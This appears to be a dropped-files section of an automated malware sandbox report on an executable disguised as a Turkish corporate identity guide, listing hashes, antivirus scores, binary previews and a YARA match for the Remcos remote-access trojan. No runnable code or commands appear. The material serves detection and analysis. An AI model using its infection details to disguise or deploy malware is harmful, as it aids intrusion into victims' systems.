                                                                                                                                              SHA-256:2EB8015D95B1F69ECA4ACC3D64C0ED58125431A19DF865A493990025EBE5B40A
                                                                                                                                              SHA-512:0E70A67684146E4DD4D3D7984EF66B03F5370340B82CC86B1D79408C102B06BB69A31A17ADDEC773C24FDDD3E4780C35A780D549BD944AAA33A0B73F68F57B68
                                                                                                                                              Malicious:true
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                              • Antivirus: Virustotal, Detection: 39%, Browse
                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h...........3............@.......................................@..........................................................................................................................................................text...'f.......h.................. ..`.rdata...............l..............@..@.data...............................@....ndata.......P...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x30d46ad8, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):41943040
                                                                                                                                              Entropy (8bit):1.3142051114709643
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:6nzdCnr6064mtPwfY9Mk3vuuv68Kn4m5m7o6kPV3cDQgGEBKg9joW2g/JF7AJxu+:br61yfY9l6vcDQgGygu2
                                                                                                                                              MD5:E097640ECC2F9B26E04AFCEE82480FDD
                                                                                                                                              SHA1:477D7E873D8D3B2E01FD4D16059F0289676051DE
                                                                                                                                              SHA-256:668064273C1F4D944F71DEE5107C86F4E0772B14CBC6325D06D20A82E9475401
                                                                                                                                              SHA-512:9FA8FD4F8C662E85EC3F10393CA5E3284325B62344D0B9052DA432EC34DA6124DC65285A0328BB2CCB57A6C01FA3F8D203B6B3F280D241E037C86F2B0982DAB7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:0.j.... .......)............*...y........................V.?...!....{W.,....{#.h.X.?.........................Be ....y7.........................................................................................................bJ......n...............................................................?...?....................................... .......2....{e.............................................................?...........................................................................................................................N...:....y!..................................J..,....{#/................t.L.,....{#.................?........#......h.X.?...................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2
                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Qn:Qn
                                                                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..
                                                                                                                                              Process:C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12288
                                                                                                                                              Entropy (8bit):5.719859767584478
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                                                              MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                                                              SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                                                              SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                                                              SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                                                              Malicious:false
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              File Type:ASCII text, with very long lines (32342), with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):32342
                                                                                                                                              Entropy (8bit):2.712086409912803
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:y8kjEYEeTlNJXJ20DsAhKqSlE6HKjKU0SMbL+bqhXytoZEDQokkR50bxZ:FqlXJ2UsABhwKIhoN+dZ
                                                                                                                                              MD5:B2E4177FF41597CA00B494FFD0C56B32
                                                                                                                                              SHA1:BD802A0FD538621F8456D955C6A23B4C13F20481
                                                                                                                                              SHA-256:4EA03BF7825B4DE3B416D6EE79F030221E0D9137A7394D316297414856E7E8FC
                                                                                                                                              SHA-512:F97E70D6B8C8F0505BCDC06F954BA854C5520BA1B59DF3559BC5C286024F1A64F3D39D2E07251B1117AEF335C415D79DF451C47EFEFAC5326B0906A9FD28FB7D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:00D200003B3B1F04BDDB5945E293391FB7DE3D1EB6CD0500F0C04A05EB854A1EF899433F21328AE72F3BEB9B504D9BDB0F16ACCC2C1EB4CC2B5FB5891843F8854A1EF899124FE8995A47E8995A5BF8C04A47F4891A57E8854A1EF89D4657B1895A0FE0994657B1895A5EB1871842F8E121328AE72F3BEB9B504D8EC01803ADC80636B4C50514F0C05A5BB1895C46E99D5A4EE19B4657B1895A0FEB995A47F4890357E8D15E47F1D94405E9E121328AE72F3BEB9B504D8BCC1E31B1C50F27B7C00403BDDB421EF8DB5F5BF8C04A4FE8994A5BF8C04A47F4C04A47F1C04405EB894A3F21328AE72F3BEB9B504D8ACC0B139EC00612F0C01842F4890357AA984657B1895C46E99D5A4EE19B465DB1895A5BF8C04A47F1C04405EBE11F04BDDB5945E2932916B4C53D1EB6CD050088DB05148F810305E989461EF899461EF8994657B1895A5BF8C04A47F1E100282828282800ED007100000000009D000000009090909000CDCDCD00FC00ADAD0000A8A8000000003434000000000000000000000000FB00DA00005D5D0000000000C700000000000000E70000000000006D6D00BB000000000000000000620015000000AEAEAE009B9B009D000000BEBEBE00B5B50000636300A40014141414001D000000000B0000E0000000E200340000676700000026003A3A003A3A000000000000EFEF007A7A
                                                                                                                                              Process:C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):518
                                                                                                                                              Entropy (8bit):4.2438612386567005
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:7ZLxphSHeKKtrz1oI+z1AObYAZ1wqFh87vQ:FNHS+KKtv1op6ObdwmCvQ
                                                                                                                                              MD5:56DA579148B8B7B3DF75890CE348AAD9
                                                                                                                                              SHA1:59C00C11AA27EE294AEEDFC8A202A30C8F9E7507
                                                                                                                                              SHA-256:4082AA3989480E8FA1D8D41A910792B16CAB127428F408FB5E13311307885BC8
                                                                                                                                              SHA-512:D33312CA365CB2BF7167066A93CC3A386BC9CF23119A73CBECC73A33EA1F07803E6B126CCDC3402963BCE10C56E8C5E17610A07D2C3ECC7D1A32CC01866BC5BE
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:indfringerne skattesprgsmaalenes syphers,undersoegelse fremhaevede udkiksposters servicegarantierne kvder semidefiniteness grene..blattodea sunnier haabefuldt epitomising pedagogying daddelpalmer nonreservation misconstruction moruloid cundeamor biophor balletically..lastefuldt processers vrdiangivelsernes buriss sylfidens udlaaningers..afvrgepligts solidago tartralic unmeteorological frtidspensionbjr info aandlsheden kysk sekundaerprocesser hindbaermarmelade..vertikalerne tusinders hetoroseksualismen nabogrunde.
                                                                                                                                              Process:C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):43841
                                                                                                                                              Entropy (8bit):4.9472939294514005
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:AUp0OKgF3sjLzb2ruj6i1hgFz6PDvBzooMnp+jz24E6j8:Jp6vvlj64SFz6rvBaEf24Ey8
                                                                                                                                              MD5:6E5C3C8EF090D577425BD9EC8598752D
                                                                                                                                              SHA1:A783B5F8BF48051DA517E36C441CAAE1B78572A0
                                                                                                                                              SHA-256:0D79E0CD4594F72B327DA289AA1A7B4D168558D782D87946F1D05F99A6AA0E41
                                                                                                                                              SHA-512:8E74A55145E78F6DC0EDA6893170F19D1C342AE9995BF2D50D3085F9BE98BF63C2DA377366751122A1A1AC21DAFF11E9F817F4C8A9C04D003D03B5C1B16E804D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.2...........).......,..ir.y........K................L.....[.X.].....n.M..........................I..{........g.......2R..................)..J.....,.{.,.,j.........4....H...........8W.....|n..K.......U............Y.5..........N..6...yY..k.g..........D.......v...L.,.........Q..........a.W....f.............g........%..+...Q.............*.........Z..2..........................r......%....._.q...........5.........".-....;.......G..i.........:......Y...L.......6.....\S....T...R.;......G.........#s..bU..O...Yp........A....e........z......p.<..b......`.E.E..*..,.%L......C...Hj3.....0.W....,.......h....>........4..?e/#.....D.......'...........I6..F.....v...A.7..q.......}...y...S..(...6h............n....o..<....V^......@..!.e.L}.j.+.......%.<O._*v.......}.[...f...............X...}).u...............V.....X.A..r.......M....N...........~....[..39.............|..L.0......4...I.......Z..........,....\.../...7......h.,..D....Q.>.ra...5............................M.O....q.......+...:.`~
                                                                                                                                              Process:C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):257688
                                                                                                                                              Entropy (8bit):7.769264221926552
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:FtHmGzaQ3l9na3Dz5wzmDP0nw+QnZyCerP6+oJMjGt:DH33HnK5LCwFnZyCC56
                                                                                                                                              MD5:3DEC7AF9BDE3412F4B03F07BD4AD5881
                                                                                                                                              SHA1:5A94DAEF7B4F9184668C2E2DEBA7D8CA07CFFF00
                                                                                                                                              SHA-256:1057217A1BE6F04D5F56665BBBB645064F27A397851C292D1FE1A4F00F1E792D
                                                                                                                                              SHA-512:B6BF344A83C00FEB6F7C57315611C022A183A86FA4AD6D041511EE276D035AE7F331643CB8C7ADFE1470E0E6AACB8523DD5321B66939AC29D21DB9C6F42E2237
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:................2.............a........U.]..................555.....N...................@.........Z.. ....XX......bb....``....CC...HH..........j........7.............~~~.>>>>.%%%...h.....OO................................'''.P.&&.'..................................88................N.????????...........QQQQQQ...............B......C.>.cc..z........*......%%%%%........./..LL......:.....................EEE...........F..eee................w.d.``.pp........w......&..////.77............#....-...........R....................vv.....O.................6...9........................ww......||.?..........e.9......|||..................q........999...............7777.........................E........................................q.........&&&.JJJ...h...@@@......11......==...........R.................................R..k........$.L.f..........f...f.....|...f...q....)=mf=.?......f...E.nvf....l.z.......X...,......f.........K.2|f....Q..mf...f..o......f!......P...f........\X.>.4...#...........W.t..
                                                                                                                                              Process:C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):21803
                                                                                                                                              Entropy (8bit):4.9383038764473834
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:pFUuUD34eHxVqII046Z+Lqv18gDtkXF7bFuHkyWxWkYY7l:HUxD1RXI0tMLqvHuXZMHZWmY7l
                                                                                                                                              MD5:85CC2D5B36C9C45811901DC879424E83
                                                                                                                                              SHA1:F7E9C8B480F9642F7C7BF78EECEC50D831E76A4F
                                                                                                                                              SHA-256:908CCB30B856193065020AC5E16BC195B1BF2A46D9A314243BF84C9FF9596D1D
                                                                                                                                              SHA-512:D1BC157ACA22182CF6432E3CBDCECD5CFDB7E91BC482DF7B17D2F09A0113A41B24128B1498C2358A594C404B557A114DC1E6F343B95824086A64058A4F3BE0A3
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.2...................x....O..........-m...O._..../.................|....7.g.I....&...5./.=.....X........w......F........;.....................Y..............}@.....3.b....o......$(a;............s;..L.M...0...#.........<...7.h........'........F............1.......................B..6......M.........nCr..5...6........./*].N........;..Z:..Y.l.....s..C.........H.......k...b.._\"i..~............w...u......#.F..{..1...[...........\)..j.bA-......i..C.v]m.....^...m]..Y.........K.............Q.........]......'..I.p..8.$.......M...&...............)D.lE7...\e".3............O.......e.Ou.../.....6................F'...0.....................d..........*.=..\.............]...(dU(..y.v1......'..^.0...............A3...<"..(W..).3...PW..........D....D...@.........Y........ .......-.....[.`.s.G.$V...l.....F......n...<.............S3T.............#..............w.......\....6...4..a.A.l..jt.....!d.......c...f3........+...n.......!.;........-D...IXD.Q..5._.Tb............i8......Q.`.......,W....'
                                                                                                                                              Process:C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):81365
                                                                                                                                              Entropy (8bit):4.951136235241379
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:BaPvst6NTHD+DH47qfrEvzKttGqNSgebjKHgMi8A2ATSUKp7eqG+6i:E8Ye4+f4vzqpebu5i8AtSUKpV
                                                                                                                                              MD5:A3D650A87CFE589DBFB12A51A1226811
                                                                                                                                              SHA1:453F4D898624E8C77D809556E5AB105BF5B7EDCE
                                                                                                                                              SHA-256:24EA41D6C195676CEC5A05703291A266257AE168E85B8FDD9E3E855A9B6AD046
                                                                                                                                              SHA-512:C2B1EB46FCE3BB9F2E48F3202D6AF249E214649E2DFC052AC0CE505825757D21D85CB652AD62826FC3FCB48D7785AE5D85152DFBDA98F0D5B25B8DEA8BF61A9A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..........:..L...=...x....|......k..a.hI..........Z.N.......!............_..G.T.5S.....k.+.TK......&.........k...>.k....[.....$@......Ek$N......9..~...7.........G........e.....S......................O.^.j.'.......\%H....n.......v<..$Cd....w...f......*.......N....H.d........8..j.....Q.T...]...J..1......0..J..5[H...T..m|..E...:.....J3.....................X....5............2.....g.....b....Q...............'......_..f....-..5..|pn..@.........M.........%.L.....Zjj.....D....q6~.4....&V........c............k....:.............^.]...........\..}.........b..P.!j.,5.8.G.U.n.................!j......`......l..lL........[^..............m....k.#........Z{.......T...7.0n....d.$..U................1...........l..C....f.....O. ....E8Q.......................;.z.....i<U....."...9..........]....%..#.....+......B6...................l.K.........F.....K........R.....5................0.......j....~.^......h.....@......s....N.o.F....$.l....F.....................L.).........w7....y... ...............w
                                                                                                                                              Process:C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):81034
                                                                                                                                              Entropy (8bit):4.966143280042011
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:Apxmt8uUrqYQTMr26//8+hfbTP/5pfl05jyLnmtunGekfB:8Q89qT4rx/8+VnXXKQLn4LPfB
                                                                                                                                              MD5:1885357A0D5DBDD84B8EC1E4AAE019C6
                                                                                                                                              SHA1:8063A464852157BC3ACD0F410D9340DABF5FFCD5
                                                                                                                                              SHA-256:8027D2A2F30EBE6F8238A84A76A61F1F5504C6CF9F111AD0FB639355847EFC33
                                                                                                                                              SHA-512:9AD20E2CFE9C24232CC1222FEF738FCF5BC83077BEA64DB395ABF1CA768F8DFC89E15D4184008E0A403BA775DB2AEE0571FCB83658BF6D73FD1BDF5995BF9DEB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:......,.v.....l..a....). ...G.\.....)...]....g...1X......S......%....6...*............2.......-.....;............{Z...r........4..O1........t.....%...:...n......{..]....z...i.................4....r......q......1.ml.@.R.................A............n......Z.p...+.............-..............v...........yE...S...@*..jh....%..#'.....I........2.......Q..d.....3..............x.......E.....V..D(.............[...K.......'..........j....U.9..&.r..9Px........P.-......8....A..............,......X...........y.........g.._Gb2...Y]............J..P....]#....T.L4.5...........L./.............2..i...........]..................M.{..)y..;V....:E.>..:......icM..>..........8..a........]O9..a.........et..(.....x@........r.........."..J....?..k.........A...W.\....F.@.6.........Bo....t..#..2.... ...0n.j.y....1...........D..........SN.b..........z.}...n...]......C.....K....|E.................Q..3F......h...Z......k..............e..w...:......................(...w........7W.....#.......l..J..Wh...3..Is
                                                                                                                                              Process:C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33151
                                                                                                                                              Entropy (8bit):4.95016969568472
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:zJN995ttMvQQ5pVqLfRfSuIyZzcZCTBnBL9g:znz6oQ5pCfdzZACTm
                                                                                                                                              MD5:523A2EAE6FED93FAD641378D499CFB13
                                                                                                                                              SHA1:DEDB859E9ADC44A7BA6CF9AE1A8B120A5971E1DF
                                                                                                                                              SHA-256:6DA59EA00AF0C268B12F2EB1077DC1229D8336A60AE3DF64D2631170EEDF361F
                                                                                                                                              SHA-512:C5E9C6FD1758372506862E1FC15908B38C1B43E201DE29268D558724F247765B4740D0B3FAF1072C89497C958207E7711C25364AFCEC42D94B1D482E3FE8AF62
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.......`..p6...A......i..^...d...7........v.r.......L.......b.7.....6.\..G....C...H..J.....U.......nO.........%.OW..p..........+....'..6.[..I............K.......6..N.........Y.............H...V...v.2...>..o.z.....V*........I......S..A.........+_.t!........W......&....5j....3....;.`..........0:f...[..D. ?..N....^..o..E...Kfb..~`......og......m.\..... .)..........v...........o......~.E......H.....s..'.......@.....ic.T..J)..z................{......~..lk.{.......;.......W....r...:.."._s............r.....o(..+u......0....8..../,$."....~........c.......`.MF.........b...j....F.........t....L......Q....................'......P. ....a....l.....*.)..S.;Z.......j........G.M.....\.<$.............4.D.................f.#o.a...6U......P`.....b..c=r....k.?...mf..-.L.&.^.....Q.W......v.R..>.....j......=...W.i...~.....`...I.%................Q...........*..t.c-.......\.........+......[Z....|@....+.......[..I..4u......>..(".@..vD..............j.............=.....=..:.J\..`...."?...........6...
                                                                                                                                              Process:C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60936
                                                                                                                                              Entropy (8bit):4.941570218027665
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:klZbNthMxOfJDEhKk7ZcwYZdCZCEyu+IR9UOXCiNWuB7PiUijMAXj0kkOSsfh0H/:cbNthMeY5KPZddZubPUOyGOjMy9ZCM2Z
                                                                                                                                              MD5:68CA93776C32C0E64B548D8DBD644F53
                                                                                                                                              SHA1:31A5168074A7E51333EBF1D3DE639BE217F67090
                                                                                                                                              SHA-256:BD45F54B75BED5EA8F7975F8C3A56CB2F491AAFE456889E206A1EC114458E688
                                                                                                                                              SHA-512:37F4392783956A78F4D58F729BC3D439A3CC750880EFD0D9C3462416AFA6624898B6365A85824285A08CE827F74AA4D5C499136A1E5DCC6ABD08D0BA72AAA056
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..{.......@...[......4....F.../_..I..<.:.,.WU....t.Tr.........!......Q).Z.....................#[g..........<|%.P..............|@.....5.........5............../.....S...............].......b...+..........u.............Yr....../......?y.....[....q.>.e.............^.......O.W..1..2.w.........."....\Ya....Jm.kJ.3....#..........V..........i2...G.6w..).....w...........o.Yi.;-......a..."~...4...ip>..8...a.......#.......f...........4[.b.X%c......7Y.T....h[.'._....em.........dF.......2.nm........M..h....8.{N.O.........^k................p.........R....L........b..WT..E.../..2..........b.......q...................n...J.........\.....s.$....0............).......x...........&................y........:.............m..................=..%...........6...<51..................N..;......'S...5.Q......\..B........}.`..7......B..Z........r......j.....*...W......K..s................{....Z........d..\.........x.........%..FVOr...+.....k....|...D...!..F.<.W....e....|......................
                                                                                                                                              Process:C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5772
                                                                                                                                              Entropy (8bit):5.0190422599771916
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:l7N6//NAW/UyIMf8ozTEg60Pn9sRWwdWudZvsyoB//jI8tFe+L4V+7QY:lZANAJaf8w00VWWwdWudBsfBDvtFbe+H
                                                                                                                                              MD5:6E7B32029BC6B2939D3DB26CFB356D0A
                                                                                                                                              SHA1:058C4830759F6A0765FDDE01A9BB8EDB49E6FCC8
                                                                                                                                              SHA-256:22A733CFC276620E89DDC62817CD5BE8CF0878B39E6428B8F492B27CB0493D5A
                                                                                                                                              SHA-512:9CB878B6A42BB5B5D927764E0C17310C1D96AEAE79B411C3EDC5C26E7F08D8A2483152FB46A1083AC163D5D0DC1342A932616E8F8F57338957A7C33FAD6E22DF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:KD...<t[..s........1.2{..g...I........@.!.....N.....l.f...Q..b..U..... .C.w..q...;.....4.........D.F-Y..b..!L....... ....O.... ....*..K...?..N.........7S...~...F.............C...(.K..F....$..p...(..........M........X.Z.J.......J..C..........7....De..........M....?...F........y.............b2.....e.7.......,.D..N.x...?D.....'Y`......pZ...........6..L..4..M....g.....3..........d.........rM=.B..,.L........k.......W.........t.....................7...........|........./..'b.....f..s....#.hc....F...[............}.6D.........L:......D...............&...........e...z.E..B'./..i..E..........G.........O..q...........-........&...$........3...............-......6................c..d...x......................Ta.m.p."........z.4..[...l...........I.y....I.....yr.............L..4*.3....................I..:................)....i.......O.5d................C.u...L.........n...7......R............T.,.....`..................I.........>...z.z..7s..."*....... ....Yp.....................7..k
                                                                                                                                              Process:C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6559
                                                                                                                                              Entropy (8bit):4.921661324722055
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:akWOmmtj+X1R/KrjMbP1K3F+m9V5YIR2A7nVc/YJ0wu43AjdgHyp57rQE:abODkFNwsqYIR2anVc/Y64wVp5rQE
                                                                                                                                              MD5:CD2B020F955E136B859D4D73544F295E
                                                                                                                                              SHA1:10CB6A1A901E87493B4F9B84B5E9AF3CF6638E93
                                                                                                                                              SHA-256:9722ACF73CF6726F2559DC59FF3C10395F03AE63844D85C9465765B07B42E912
                                                                                                                                              SHA-512:8238980FE0A953B2FD02AE3E1CAB2130C69A971BD8600AD88AA350D2BEBA21657E5350537C5F129D0E9936D9FC25462F9A0A068C95096743C70BD0E269DA37BC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:P.....@...............{...........d..N^.w..T"....;6..l.......e...K.........w.......f.N........0T..T.}.'.............Y..........a..........4.F...D..:.p...N.].G....}.....+....c.......r...H/{|................m..'.....[#......v..M....Z.......!.......]...............=..$J)...'......J...q.....R-......5Oy..e................S.........!L^......................j........i.........I.J..}...7.......k.5..h..........v.C....)9...................=............`..Z..e....b....................;.......m..\..B.m.7....C$........p.....KJt............J...V..............................,....O......3.....k........X....?.................G...;...H...$..........Y...........m.....................Pe.9....:...........k....2(........2...L...........................M...~.S......B6...........z........).J..l............A......]q....G..^F...7....j...........iD.......=...(...n........4.......o...V.....9....4..............q........._.T....T.......@F.k...........2........o...w......;.................u.....D^{.......
                                                                                                                                              Process:C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):9024
                                                                                                                                              Entropy (8bit):4.915362970792497
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:nbskfPxqJalVbEEuR/9WTZcs+JjwB6FLEF:h44lVbED1MZEjbU
                                                                                                                                              MD5:98BCC29584ED7524EE0492F24B14615D
                                                                                                                                              SHA1:6493DBB937D31911C82A8D39B553891D8B0A49BD
                                                                                                                                              SHA-256:39C72F185A55457B25BEC67A88BAE7FDBCCEE4880AA8F8D132FBC9DEB3D547BE
                                                                                                                                              SHA-512:8C1A3121923FCE3B588B68F917F2B14BBD5B098434111CFDEBE47D17DF84E377AA2328F5E3F5C1712FCE65682E1A37160A3BEA7789A6205A6BFAB6F8227B9DF3
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:t..................U......Hr.....%.K.........t...K............o..............I..)..Y}..~(...........|..B....]..z.Z.g..bz.........4M..c.......=%.......3.......................h...)...J.g..e.Ia...................*..~.....I....\ZB.(.N..@...G.....-.8.e....2..Tx........Z...>2..........C.\\L......s....R.d[RA.............W.....N.......?.....#.YQ........~...H.].f=<."e.....Q...........2...|...........Z..`.....*...O..u....Z....D...............{. ..B..;. ...(...Q..............'..5....a...X..K..........$t.............M.....g.....h..../..i....Z...q.....H.O4.]...pU.!......\...<....K..:K..............n.....Za..s.r..........,.......m......r.....(........L........3.....H.j......32. ).A...@...O....N.......T.....O...>.......................`..Q.....a.........v...;...U..S.....6b............0N.3............g..04..&.....)..........^...k..................K......a..m2q...s.X....O.........&^.....r..r.D..f.,.y....;....._..&... {.......!..y.............:...........?WihX4.....C.......2/..............O.
                                                                                                                                              Process:C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):39320
                                                                                                                                              Entropy (8bit):4.944998067109953
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:m0jW1kE+iOvfiB0MmQW8ySRbgWKmj3zLJVDvKOu4gLZ77l3IFN:m0OkhyB0fS7KmDZVDCF4gtFaN
                                                                                                                                              MD5:D1BF712E659E946D9EF4FC4CCEF11819
                                                                                                                                              SHA1:50817BAD8D0F4FF70330FA3B0B0391E7686DBB8B
                                                                                                                                              SHA-256:7BB763ED1B34F080F73FDC632C65DB5B1D261B0CBCC9B6BB79E5C14297641867
                                                                                                                                              SHA-512:FE47F385330B3C71B345A584BBEF83783D060902B7677652763CF07A6A0FF69C5B84DD6E6B34316E72907966427DA317A852606F18999C4A3238EC382CA4C3A1
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.(Xx....&..._......................a.E....6....S......................-..~xT.....6...............H%\......).......o..6r......B........UN......Y.:s........O..tE...._..........U`._y......J.6w........Q.....C..9.^....................~....gj.......\.........\Q............L..............H...9.............g..@.8...........>..b.......[........f....W..8...........n...E.....i.v...................=.5..................6.}...............r....|.B....0...........<....u.....\]..........N..T..6..)J.........1..J....$...................;...........Q.f.G?S..hq......D..8hK....x......D........Id....=..=.............;....-...z.......Mh...?...3...!............!.4~..y.....]0..........I.......*k...,p................r.7...x..Q........X........H...p?.............n..i.....i.....B..........O.|..............g....1..."`..?..2.~.........}.........f....#.............>P.!..F......+P......CR........\..'<..T....k...QH.....<.@.4.f.....XI..?...........c......;...>.s.?...W.....Y..........?.........L.1.....X.
                                                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):284
                                                                                                                                              Entropy (8bit):3.4556863174294863
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:KlrlQmmNa5YcIeeDAlslrlQmmNiAbWAAeZNDxbN2fxl+Ulnm0v:KlrlgNqecmlrlgNiAbWFeZBtN2L+Udl
                                                                                                                                              MD5:8E35C5AAADEBB3AC02E19C21530B8592
                                                                                                                                              SHA1:FFC29D827086F8B5A0BF5D0E80FCD7A89F473DEA
                                                                                                                                              SHA-256:A5473173C98F013CF2A35A598703067D346E703ADF389FD77C82A9F1DF391200
                                                                                                                                              SHA-512:3911C5634D931F1DBA5670A6AF48A9DA19E1481939AE695E45B6FD4F4C09DB3181360FE0C9B517025436AE9C69255D12EA35D3345D50788AC56189E93D90D761
                                                                                                                                              Malicious:true
                                                                                                                                              Yara Hits:
                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, Author: Joe Security
